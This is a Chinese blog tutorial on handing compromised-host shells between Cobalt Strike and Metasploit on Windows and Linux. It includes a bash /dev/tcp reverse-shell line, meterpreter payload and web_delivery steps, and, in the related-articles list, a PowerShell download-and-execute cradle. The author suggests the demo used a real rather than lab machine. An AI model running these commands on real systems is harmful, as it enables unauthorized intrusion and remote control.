Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell

已于 2022-09-06 16:08:19 修改
阅读量2.4k 收藏 27
点赞数 5
分类专栏: 内网渗透 渗透测试工具 文章标签: Cobalt Strike Metasploit 渗透测试 网络安全 内网渗透
于 2022-09-06 16:07:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847838/article/details/126709628
版权

文章目录

前言

实现Cobalt_Strike和Metasploit的联动,让shell在两者之间可以弹来弹去,因为两者的功能区别还是有的,两个工具都各有所长,所以为了更多的功能能够得到利用,两者之间的联动很有必要记录一下。

提示:以下是本篇文章正文内容,下面案例可供参考

一、Cobalt Strike的shell弹给msf(windows)

首先,cs上面要有上线的主机,比如我就搞了一台windows的上线了,因为是mac电脑的原因我懒得弄虚拟机,所以又实战搞了一台来做演示,真的服了……好怀念windows ,只能打码了。
上面是普通权限,下面是提权之后的。
在这里插入图片描述
cs上面有了,接下来就是把shell派生到msf,需要提前建立监听器,Payload设置成Foreign HTTP协议,Host就设置成装有msf的vps服务器地址,公网的。下面就是端口。

在这里插入图片描述
设置完监听器,msf也要配置一下:
在这里插入图片描述
msf上面的payload要和cs上面的类型协议保持一致,用http的。然后是设置监听的主机和端口,也要和cs上面的一致。
在这里插入图片描述
点击run开始监听,然后cs点击Spawn模块,派生shell给到msf:
在这里插入图片描述
发现报错了:
在这里插入图片描述
我仔细看了一下,原来是payload设置错了,应该是下面这个payload才对。

选对payload

windows/meterpreter/reverse_http

设置的步骤和前面的一样。

然后再在cs点击Spawn,选中监听器,msf就成功获得shell了。

在这里插入图片描述
将msf的编码设置一下,就不会乱码了

chcp 65001

在这里插入图片描述
成功,和cs上面的一致。
在这里插入图片描述

二、msf反弹回cs(windows)

上面我们用cs,把shell给到msf,那么接下来就是msf再给到cs。
继续上面的操作,exit退出,再background把shell存到session里:
在这里插入图片描述
然后需要用到msf的local/payload_inject模块来进行反弹shell。
在这里插入图片描述
这里的lhost和lpost就是cs上面监听器的配置,所以需要提前在cs上创建一个监听器:
在这里插入图片描述
在msf上面配置:
在这里插入图片描述
完成后直接exploit或者run:

在这里插入图片描述

cs立马上线。
在这里插入图片描述

三、目标Linux系统,cs反弹回msf

这个我之前有写过,直接贴链接。很详细的说明。

Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
通过上面的办法,让一台linux系统的主机先上线到cs后,开始下一步的操作。
下面我是又搞了台Linux的上线cs了:
在这里插入图片描述
将这个cs的shell再给到msf,用到的方法很简单,📢注意了,Linux的主机可不能再用cs的派生shell模块Spawn,是没办法用到。为了解决这个问题,要从Linux最本质的原理出发,它不是自带反弹shell的base -i么,直接用就完事了。

先在msf上建立监听:
在这里插入图片描述
注意payload一定要选对,确定好Linux的系统版本.
在这里插入图片描述

然后监听的类型是反向连接的reverse,协议tcp。run或者exploit开始监听,然后在cs输入base -i 反弹shell命令:

bash -i >& /dev/tcp/vpsip/2321 0>&1

发现不行,没有反映,我又试着用pyton的反弹shell命令,也是不行,前者是毫无反应,后者有反应,但是弹不回shell.

在这里插入图片描述
命令没错,具体为什么不行,我现在也不知道为什么,有知道的可以说一下。但是解决的办法肯定是有的,条条大路通罗马。

web_delivery模块一条命令上线msf

我思来想去,还得是用到这个模块:

exploit/multi/script/web_delivery模块

直接一条命令上线msf。操作如下:
1、使用exploit/multi/script/web_delivery模块
2、设置target目标,为set targer为Linux
3、设置payload,payload是反向连接的类型reverse,
tcp协议。
4、run或exploit执行
在这里插入图片描述
运行后会出现一条命令,直接cs复制粘贴运行即可:
在这里插入图片描述
ok大功告成,msf成功接收到了session.
完美!
在这里插入图片描述
执行命令也是没毛病:
在这里插入图片描述

四、目标Linux系统,msf反弹shell给cs

那么,又到了最后一步,也是这次完整实验的最后一个,目标是Linux的,怎么给到cs。
同样的,也可以用老方法:
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
将Cross2C生成的文件在msf中执行它,cs就可以上线了,但是这个办法有点麻烦,因为要文件上传,搞来搞去的不是很方便。但是我又实在是找不到更容易的办法。
Linux系统还是没有windows的渗透好搞,就是步骤比较麻烦一点,问题不大,如果有什么更好的办法,请大佬们告诉我。

总结

最全的Cobalt Strike和msf之间的联动实验了,我看网上都是东一块西一块,还没见过windows和linux系统合在一起说明的,今天我一次性把双系统,双工具之间的联动讲得明明白白。主要是最近加班多,脑子记忆力不太好,很多东西昨天学今天忘,一下子不做就容易忘记,又来百度找资料就很麻烦,而且很多抄袭甚至不成功的办法也贴出来,处处碰壁,所以干脆自己记一记,下次直接在自己主页搜就方便了。

    文章原创,欢迎转载,请注明文章出处: Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

归去来兮-zangcc
关注
  • 5
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
【实战系列 1】记一次从SQL注入到3389远程登录Windows桌面并上线CobaltStrike
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-07 3481
大家好,欢迎来到我的实战系列专栏,这里的文章没有水分,全是实战干货,这是实战系列的第一篇,是测试一个系统发现的sql注入漏洞,最后上线cs的也是一个比较老的windws系统
APT组织最喜欢的工具 Cobalt Strike (CS) 实战
悦分享
08-03 2159
Cobalt Strike是一款以Metasploit为基础的GUI框架式渗透测试工具,自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,常被业界人称为CS神器。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。...
cobaltstrike-linux
01-26
cobaltstrike for linux
Cobalt StrikeMSF联动
Longwaer
02-10 1278
学习掌握CS的各种小技巧,便于渗透工作中的运用。
内网渗透MSF渗透阶段的常用指令笔记
最新发布
uuzeray的博客
07-09 1408
不需要访问目标主机磁盘,所以也没什么入侵的痕迹。download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\boot.ini /root/或者download C:\"ProgramFiles"\Tencent\QQ\Users\295。run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
msf传递shellcobalt strike
mirror97black的博客
04-11 2259
前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))" 方法2:通过msf的expl...
CobaltStrikeLinux上线笔记 (CrossC2插件使用)
热门推荐
box
03-03 1万+
CobaltStrike 默认是不支持Linux 的上线,有一款插件解决了一个问题。就是GitHub的一个项目——CrossC2,以下就介绍一下这款插件的配置和使用。 一、插件配置 项目地址:https://github.com/gloxec/CrossC2 将这两个文件下载下来,创建一个文件夹,并放置文件夹下 修改 CrossC2-GithubBot-2021-11-02.cna 修改**$CC2_PATH**为真实路径,对应本地存放的CrossC2路径。注意最后的 / 修改$CC2_BIN 为pay
cobaltstrike使用教程-linux上线Windows
weixin_69925635的博客
06-05 167
看有的文章说这里设置sleep 0可以缩短交互间隔,但是我设置以后没有什么区别,有兴趣的可以自行尝试。添加监听器,同一个监听器每次开启cs只能用一次后面会报错,没有找到更好的解决方法。在同一文件夹另一个终端下开启客户端,密码是上面设置的123456。生成payload在Windows靶机上运行。这里的地址都填本机,然后选择web投递。可以看到靶机上线,获得shell。下载cs4.5压缩包并解压。
csmsf联动概述
weixin_43873557的博客
02-08 2426
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
Cobalt Strike使用教程二
迷风小白
10-24 6819
0x00 前言 继前一章介绍了Cobalt Strike的基本用法,本章接着介绍如何攻击、提权、维权等。 0x01 与Metasploit联动 Cobalt StrikeMetasploit msf开启监听模式 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.18...
webshell流量隐蔽&CSMSF联动
Ms08067安全实验室
03-29 2041
文章来源|MS08067 内网安全知识星球本文作者:BlackCat(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067环境:Windows:192.168.93.3 ...
SharpeningCobaltStrike:在适用于Linux Cobalt Strike C2的实时v3540 dotnet编译器中。每次使用新的经过编译和混淆的二进制文件
03-19
锐化钴击 在Linux钴罢工服务器上使用ConfuserEx实时编译dotnet v35 / v40 exe / dll二进制文件+混淆。 当您指定要在信标上编译并执行的.cs文件时,编译器会自动在该源目录和子目录中搜索所有.cs依赖项并针对它们进行编译,因此无需将所有内容合并到1个.cs文件中,记住这一点,所以您不要将多个项目放在同一目录中,因为这会产生冲突。默认情况下,将在Compiler/References/net*/下的所有.dll文件作为对每个已编译项目的引用进行加载。如果您想要更好的opsec并仅将必要的.dll文件作为引用加载,则可以通过在要编译的项目的源目录中删除一个名为Refs的文件来做到这一点,它将仅导入那些.dll名称而不是所有内容。引用示例 root@kali:/# cat Rubeus-master/Rubeus/Refs System.DirectorySe
Linux被控主机反弹shellCobalt_Strike(CS)-详细实战笔记
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-28 3349
利用CrossC2插件工具,将Linux系统shell反弹Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell内网渗透工具Cobalt Strike(cs)。
CobaltStrike上线Linux主机(CrossC2)
做自己喜欢的事,并将其发挥到极致!
12-19 2651
CobaltStrike上线Linux主机(CrossC2) 在红蓝对抗中,常见使用远控方式是CSWindows的远程控制,那么CS能否对Linux主机进行长期远控呢! CrossC2插件是为企业和红队人员提供的安全框架,支持CobaltStrike对其他系统平台的渗透测试(Windows、Linux、MacOS),支持自定义模块,并包括一些常常用到的渗透测试模块。 CrossC2插件项目地址:https://github.com/gloxec/CrossC2 下载该项目到本地 将src目录下的文件
cobaltstrike进阶篇之linux上线linux
weixin_69925635的博客
06-05 285
cs的部署和基本上线过程可以参考我前面一篇文章,接下来尝试利用linux(服务端和客户端都放在同一台kali上)上线linux(ubuntu)将CrossC2-GithubBot-2023-03-27.cna其中path改成genCrossC2.linux的path。选择CSversion为4.4,日志中出现success,在指定目录下出现t_cc2.out,传到靶机并双击运行,成功上线。这个时候cs顶部会多出来一个选项,选择创建一个c2监听器,在之前需要先创建一个https的监听器。
Cobalt Strikecs)配合插件CrossC2,实现linux上线
m0_61867082的博客
06-26 3268
Cobalt Strikecs)配合插件CrossC2,实现linux上线
CobaltStrike4.0上线Linux系统
就这样吧
09-15 1095
环境介绍 客户端系统:MacOS BigSur 服务端系统:MacOS BigSur 软件版本:CobaltStrike4.0 插件版本:CrossC2-cs4.0 被上线主机系统:Ubuntu20.04 插件介绍 面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。 ▄████▄ ██▀███ ▒█████ ██████ ██████ ▄███
边界突破之linux系统上线Cobalt Strike
吾所在处,即为净土
11-30 858
别低头,皇冠会掉;别流泪,坏人会笑
基础CobaltStrike上线Linux主机
战神/calmness的博客
07-24 586
准备环境 1、(CrossC2) CrossC2-cs4.1\src\CrossC2.cna https://download.csdn.net/download/weixin_43650289/20447236 2、LINUX云服务器 3、C2插件genCrossC2.Linux 上传至Cobaltstrike3.14目录下 https://download.csdn.net/download/weixin_43650289/20447188 4、云服务器 5、CobaltStrike3.
cobalt_strike_c2隐匿多级nginx反向代理
10-17
Cobalt Strike C2 是一个常用的网络攻击工具,用于进行渗透测试和红队行动。为了更好地隐藏自身并增加隐匿性,Cobalt Strike C2 可以通过多级 NGINX 反向代理来进行隐匿。 NGINX 是一个高性能、开源的 Web 服务器和反向代理服务器。使用 NGINX 反向代理可以隐藏 Cobalt Strike C2 服务器的真实 IP 地址,提高其匿名性和免受检测的能力。 多级 NGINX 反向代理是指将一级代理服务器的请求再转发到二级代理服务器,二级代理服务器再将请求转发到 C2 服务器。这样,攻击者可以在多个层次上混淆和隐藏自己的真实 IP 地址,增加对手的追踪难度。 在这个过程中,每一级代理服务器都可以对进出的数据进行进一步的加密和解密,即使被探测到,攻击者也难以解密出真实的数据内容。 通过使用多级 NGINX 反向代理,Cobalt Strike C2 可以在网络上更为隐匿地进行通信,减少被检测和追踪的风险。同时,这种架构还可以提高系统的可扩展性和负载均衡能力,提高对抗DDoS等攻击的能力。 需要注意的是,虽然多级 NGINX 反向代理可以提高 Cobalt Strike C2 的隐匿性,但对于有经验的网络安全人员来说,仍然可以通过其他手段进行识别和检测,因此在实际应用中,还需要结合其他安全措施来提高系统的安全性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

归去来兮-zangcc

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值